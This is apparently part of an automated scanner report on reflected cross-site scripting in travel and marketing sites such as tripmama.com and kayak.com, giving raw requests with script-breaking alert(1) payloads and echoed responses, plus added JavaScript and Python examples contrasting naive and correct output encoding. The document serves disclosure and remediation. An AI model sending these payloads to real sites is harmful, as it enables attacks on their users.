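The findings so far fall into two contexts: user data inside a quoted HTML attribute (network.realmedia.com, www.aa.com, www.igougo.com) and user data inside a JavaScript string literal (travel.united.com, www.allhotels.com, www.marketingvox.com). The marketingvox finding makes a point that the "Remediation detail" paragraphs leave implicit: in a script block the HTML parser runs first, so a `</script>` sequence ends the block regardless of whether the JavaScript string around it was escaped. The following is an added example, not code from the report or from any of the sites it names; it puts the encoder each context needs beside the incomplete fix that the report's own payloads defeat. The `var p = "..."` and `<input type="hidden" name="...">` templates are assumed simplifications of the reflection points shown in the report's responses.

```javascript
// Added example; not code from the report or from any site it names. It puts
// the output encoders the findings call for beside the incomplete fixes that
// the report's own payloads defeat. The inputs are the probes quoted above.

// Incomplete fix for the script-string context: backslash-escape the quotes.
// This stops "-alert(1)-" but not </script>, because the HTML parser ends the
// script block before the JavaScript parser ever sees a string literal.
function naiveJsEscape(s) {
  return String(s).replace(/\\/g, '\\\\').replace(/"/g, '\\"').replace(/'/g, "\\'");
}

// Incomplete fix for the attribute context: remove angle brackets.
// This stops "><script>, but neither "style="x:expression(...)" nor
// " onerror=alert(1) needs a bracket to add an attribute to the tag.
function naiveAttrEscape(s) {
  return String(s).replace(/[<>]/g, '');
}

// Safe JavaScript string literal for use inside a <script> block.
// JSON.stringify escapes quotes, backslashes and control characters; the
// second step escapes the characters the HTML parser acts on, so the literal
// can never contain "</script", plus the two line terminators that older
// JavaScript engines reject inside a string literal.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Safe attribute value: encode both quote characters, so the value cannot end
// the attribute whichever quote the template uses, plus the tag delimiters.
function htmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Templates mirroring the two reflection points in the report (assumed shape).
const renderScriptNaive = v => `<script>var p = "${naiveJsEscape(v)}";</script>`;
const renderScriptSafe  = v => `<script>var p = ${jsStringLiteral(v)};</script>`;
const renderAttrNaive   = v => `<input type="hidden" name="${naiveAttrEscape(v)}" value="1">`;
const renderAttrSafe    = v => `<input type="hidden" name="${htmlAttr(v)}" value="1">`;

// Checks a reviewer can run over rendered output.
// More than one "</script" means the value ended the block early.
function scriptCloseCount(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Attribute names the HTML parser would see in one tag; any name that is not
// in the template was injected by the value.
function attributeNames(tag) {
  const names = [];
  const re = /([A-Za-z][\w:-]*)=("[^"]*"|'[^']*'|[^\s>]+)/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// The safe literal must still decode to exactly the original value.
function roundTrips(v) {
  return JSON.parse(jsStringLiteral(v)) === v;
}

const PAYLOADS = {
  jsBreak: '3850f"-alert(1)-"dd9070638b4',
  scriptClose: '84d2a</script>d4ea5dac053',
  attrTag: '37454"><img src=a onerror=alert(1)>be1efe7f575',
  attrStyle: 'a3c36"style="x:expression(alert(1))"195a9c2eff1',
};

console.log('naive script closes:', scriptCloseCount(renderScriptNaive(PAYLOADS.scriptClose)));
console.log('safe script closes: ', scriptCloseCount(renderScriptSafe(PAYLOADS.scriptClose)));
console.log('naive attr names:   ', attributeNames(renderAttrNaive(PAYLOADS.attrTag)));
console.log('safe attr names:    ', attributeNames(renderAttrSafe(PAYLOADS.attrStyle)));
```

`htmlAttr` alone is not a substitute for `jsStringLiteral`: HTML entities are not decoded inside a `<script>` block, so entity-encoding a value there corrupts the data rather than neutralising it, and in an inline event-handler attribute the entities are decoded before the JavaScript runs, so quote characters come back. Pick the encoder by the context the value lands in, which is exactly the classification the report's "Issue detail" paragraphs give.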
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ebbd</script><script>alert(1)</script>b08c3704bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cautious-online-shoppers-more-likely-to-buy-046747/?6ebbd</script><script>alert(1)</script>b08c3704bae=1 HTTP/1.1 Host: www.marketingvox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <link rel="st ...[SNIP]... w', 'MV: Entry: Cautious Online Shoppers More Likely to Buy']);
4.27. http://www.nextour.co.kr/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.nextour.co.kr
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c289"-alert(1)-"71da0a99601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3c289"-alert(1)-"71da0a99601=1 HTTP/1.1 Host: www.nextour.co.kr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 15:54:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta ...[SNIP]... ;
4.28. http://www.pronto.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pronto.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d2fe'><script>alert(1)</script>ee9b628149b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2d2fe'><script>alert(1)</script>ee9b628149b=1 HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the categoryName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e52d"-alert(1)-"eea9d11b805 was submitted in the categoryName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category.jsp?actionType=1&categoryType=Type&categoryName=Flights6e52d"-alert(1)-"eea9d11b805&sid=S287&bid=B314947 HTTP/1.1 Host: www.travel-ticker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head>
<meta name="google-site-verification" content="FFxTPlXl5PxHoFPYnWOWx2LidO1L6Ex ...[SNIP]... set // from the contents of the page AnalyticsSupport.setAnalyticsContextVariable("channel", "Type"); AnalyticsSupport.setAnalyticsContextVariable("prop10", "Flights6e52d"-alert(1)-"eea9d11b805"); </script> ...[SNIP]...
The value of the TMAffiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae01'-alert(1)-'1fb9aacf846 was submitted in the TMAffiliate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?TMAffiliate=COAListing5ae01'-alert(1)-'1fb9aacf846 HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head"><meta http-equiv ...[SNIP]... t language="javascript" type="text/javascript"> function referafriend(){
var frn = 'http://www.tripmama.com/default.aspx?tabid=165&url=http://www.tripmama.com/default.aspx?TMAffiliate=COAListing5ae01'-alert(1)-'1fb9aacf846'; mywindow = window.open(frn,'mywindow','menubar=0,scrollbars=1;status=0,resizable=0,width=670,height=600'); }
</script> ...[SNIP]...
4.31. http://www.tripmama.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tripmama.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2ec0'-alert(1)-'1cc570690fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f2ec0'-alert(1)-'1cc570690fa=1 HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the InhouseAdImg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52954'-alert(1)-'47b62fae07c was submitted in the InhouseAdImg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?TMAffiliate=CheapoStay&TMSub=List&InhouseAdImg=/travel/banners/TripMamaH160x600.gif52954'-alert(1)-'47b62fae07c HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the TMAffiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53cac'-alert(1)-'300c6b6f71e was submitted in the TMAffiliate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?TMAffiliate=CheapoStay53cac'-alert(1)-'300c6b6f71e&TMSub=List HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head"><meta http-equiv ...[SNIP]... t language="javascript" type="text/javascript"> function referafriend(){
var frn = 'http://www.tripmama.com/default.aspx?tabid=165&url=http://www.tripmama.com/default.aspx?TMAffiliate=CheapoStay53cac'-alert(1)-'300c6b6f71e&TMSub=List'; mywindow = window.open(frn,'mywindow','menubar=0,scrollbars=1;status=0,resizable=0,width=670,height=600'); }
The value of the TMSub request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971da'-alert(1)-'79c2d86397b was submitted in the TMSub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?TMAffiliate=CheapoStay&TMSub=List971da'-alert(1)-'79c2d86397b HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head"><meta http-equiv ...[SNIP]... "javascript" type="text/javascript"> function referafriend(){
var frn = 'http://www.tripmama.com/default.aspx?tabid=165&url=http://www.tripmama.com/default.aspx?TMAffiliate=CheapoStay&TMSub=List971da'-alert(1)-'79c2d86397b'; mywindow = window.open(frn,'mywindow','menubar=0,scrollbars=1;status=0,resizable=0,width=670,height=600'); }
</script> ...[SNIP]...
4.35. http://www.tripmama.com/default.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tripmama.com
Path: /default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a36f7'-alert(1)-'a6741b80b63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?a36f7'-alert(1)-'a6741b80b63=1 HTTP/1.1 Host: www.tripmama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5134e"><script>alert(1)</script>204df97cca7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. For the Referer header specifically, a victim who follows a link from an attacker-controlled page whose URL carries the payload will send that URL as the Referer, subject to the browser's referrer policy; current browser defaults send only the origin on cross-origin navigations, which strips the query string and with it the payload. This limitation partially mitigates the impact of the vulnerability.
Request
GET /us/us.asp HTTP/1.1 Host: joinexpedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5134e"><script>alert(1)</script>204df97cca7
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 15:59:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 51530 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCATQCRAD=ACIPOHFCPCJMOMALBHFLICBE; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <meta http-equiv="Cont ...[SNIP]... <input type=hidden name="00N7000000231Le" id="00N7000000231Le" value="http://www.google.com/search?hl=en&q=5134e"><script>alert(1)</script>204df97cca7"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4b6'-alert(1)-'b3e08ce0f0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. For the Referer header specifically, a victim who follows a link from an attacker-controlled page whose URL carries the payload will send that URL as the Referer, subject to the browser's referrer policy; current browser defaults send only the origin on cross-origin navigations, which strips the query string and with it the payload. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2a4b6'-alert(1)-'b3e08ce0f0a
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 16:00:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D2a4b6%27%2Dalert%281%29%2D%27b3e08ce0f0a; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDSQDRBASS=HCNCNJICKKNNBMHIFEBMDBGE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e908a<script>alert(1)</script>2c316bd4508 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. For the Referer header specifically, a victim who follows a link from an attacker-controlled page whose URL carries the payload will send that URL as the Referer, subject to the browser's referrer policy; current browser defaults send only the origin on cross-origin navigations, which strips the query string and with it the payload. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3d820<script>alert(1)</script>30bf94311b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. For the Referer header specifically, a victim who follows a link from an attacker-controlled page whose URL carries the payload will send that URL as the Referer, subject to the browser's referrer policy; current browser defaults send only the origin on cross-origin navigations, which strips the query string and with it the payload. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 3e428<script>alert(1)</script>d653d3c791 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /h/ads/results HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3e428<script>alert(1)</script>d653d3c791
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
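The findings in this section all share one root cause: a request header (User-Agent or Referer) is written into HTML text content without output encoding, and the scanner confirms it by wrapping a probe in a random prefix and suffix and looking for that exact canary in the response. The following Python is an added example, not code from the page or from the application under test: a hypothetical handler (`render_vulnerable`) that reproduces the echoing behaviour, the same handler with HTML entity encoding applied at the output point (`render_fixed`), and the "echoed unmodified" check a tester would run against a captured response. The raw request is constructed here after the record above; the cookie values are omitted because they play no part in the reflection.

```python
import html
from dataclasses import dataclass

# Canary structure used by the scanner: random prefix + payload + random suffix,
# so the reflection can be located unambiguously in the response body.
PREFIX, PAYLOAD, SUFFIX = "3e428", "<script>alert(1)</script>", "d653d3c791"
CANARY = PREFIX + PAYLOAD + SUFFIX

# Constructed raw request modelled on the record above (cookies dropped).
RAW_REQUEST = (
    "GET /h/ads/results HTTP/1.1\r\n"
    "Host: www.kayak.com\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en\r\n"
    f"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0){CANARY}\r\n"
    "Connection: close\r\n"
    "\r\n"
)


@dataclass
class Request:
    method: str
    path: str
    headers: dict  # header names lower-cased for case-insensitive lookup


def parse_request(raw: str) -> Request:
    """Parse the head of a raw HTTP/1.x request (request line plus headers)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # split at the first colon only
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def render_vulnerable(req: Request) -> str:
    """Hypothetical handler that copies request headers into HTML text content
    without encoding: the behaviour the findings on this page describe."""
    ua = req.headers.get("user-agent", "")
    ref = req.headers.get("referer", "")
    return f"<html><body><p>Browser: {ua}</p><p>From: {ref}</p></body></html>"


def render_fixed(req: Request) -> str:
    """Same page, with HTML entity encoding applied where the data is emitted.
    quote=True also encodes ' and \" so the same helper is safe inside attributes."""
    ua = html.escape(req.headers.get("user-agent", ""), quote=True)
    ref = html.escape(req.headers.get("referer", ""), quote=True)
    return f"<html><body><p>Browser: {ua}</p><p>From: {ref}</p></body></html>"


def reflected_unmodified(body: str, prefix=PREFIX, payload=PAYLOAD, suffix=SUFFIX) -> bool:
    """True when the exact canary appears with the payload's angle brackets
    intact, i.e. the scanner's 'echoed unmodified' condition."""
    return (prefix + payload + suffix) in body


def reflected_encoded(body: str, prefix=PREFIX, payload=PAYLOAD, suffix=SUFFIX) -> bool:
    """True when the canary is present but the payload was entity-encoded,
    which is the result you want to see after the fix."""
    return ((prefix + html.escape(payload) + suffix) in body
            and not reflected_unmodified(body, prefix, payload, suffix))


if __name__ == "__main__":
    req = parse_request(RAW_REQUEST)
    print("vulnerable:", reflected_unmodified(render_vulnerable(req)))
    print("fixed:     ", reflected_encoded(render_fixed(req)))
```

Running the check against the two renderings shows the distinction the report draws: the vulnerable handler returns the canary byte-for-byte, so the injected script would execute, while the encoded rendering still contains the prefix and suffix but the payload arrives as `&lt;script&gt;`, which the browser displays rather than runs. Encoding at the output point, rather than filtering the header on input, is the right fix because the same header is usually used in several places and only the HTML context needs HTML encoding.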
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fe551<script>alert(1)</script>1f66daf43e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /h/elanding HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=fe551<script>alert(1)</script>1f66daf43e5
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 11cd5<script>alert(1)</script>283fa34da67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload da5be<script>alert(1)</script>a76990262a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Referer: http://www.google.com/search?hl=en&q=da5be<script>alert(1)</script>a76990262a0
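The note on the `/in` finding (and the `/out` and `/s/search/*` findings that carry the same note) matters when reproducing the issue with a raw HTTP client rather than a browser: the first response is a redirect, and the canary only appears in the page reached after following it. The Python below is an added example, not code from the page or the application: a constructed stand-in server that redirects `/in` to a landing page which echoes the Referer, a redirect-following fetch with a hop limit, and a check that reports reflection both before and after the redirect is followed. All paths and responses are invented for the illustration; a real client would also need to resolve absolute `Location` URLs and carry cookies across hops.

```python
from typing import Dict, Tuple, List

# Constructed canary, modelled on the finding above.
CANARY = "da5be<script>alert(1)</script>a76990262a0"
REDIRECT_CODES = {301, 302, 303, 307, 308}


def fake_server(path: str, headers: Dict[str, str]) -> Tuple[int, Dict[str, str], str]:
    """Stand-in for the application (constructed, not the real site):
    /in only redirects; the landing page echoes the Referer unencoded."""
    referer = headers.get("referer", "")
    if path == "/in":
        return 302, {"Location": "/in/landing"}, ""
    if path == "/in/landing":
        return 200, {}, f"<html><body><p>Came from: {referer}</p></body></html>"
    return 404, {}, "not found"


def fetch_following_redirects(path: str, headers: Dict[str, str],
                              server=fake_server, max_hops: int = 5
                              ) -> Tuple[int, str, List[str]]:
    """Follow 3xx Location headers as a browser would, re-sending the same
    request headers on each hop. Returns (status, body, hops visited).
    The hop limit guards against redirect loops."""
    hops = [path]
    for _ in range(max_hops):
        status, resp_headers, body = server(path, headers)
        if status in REDIRECT_CODES and "Location" in resp_headers:
            path = resp_headers["Location"]
            hops.append(path)
            continue
        return status, body, hops
    raise RuntimeError("too many redirects: " + " -> ".join(hops))


def check_referer_reflection(path: str, canary: str, server=fake_server
                             ) -> Tuple[bool, bool, List[str]]:
    """Send the canary in the Referer and report
    (reflected in first response, reflected after following redirects, hops)."""
    headers = {"referer": f"http://www.google.com/search?hl=en&q={canary}"}
    _status0, _h0, body0 = server(path, headers)
    reflected_first = canary in body0
    _status, body, hops = fetch_following_redirects(path, headers, server)
    return reflected_first, canary in body, hops


if __name__ == "__main__":
    print(check_referer_reflection("/in", CANARY))
```

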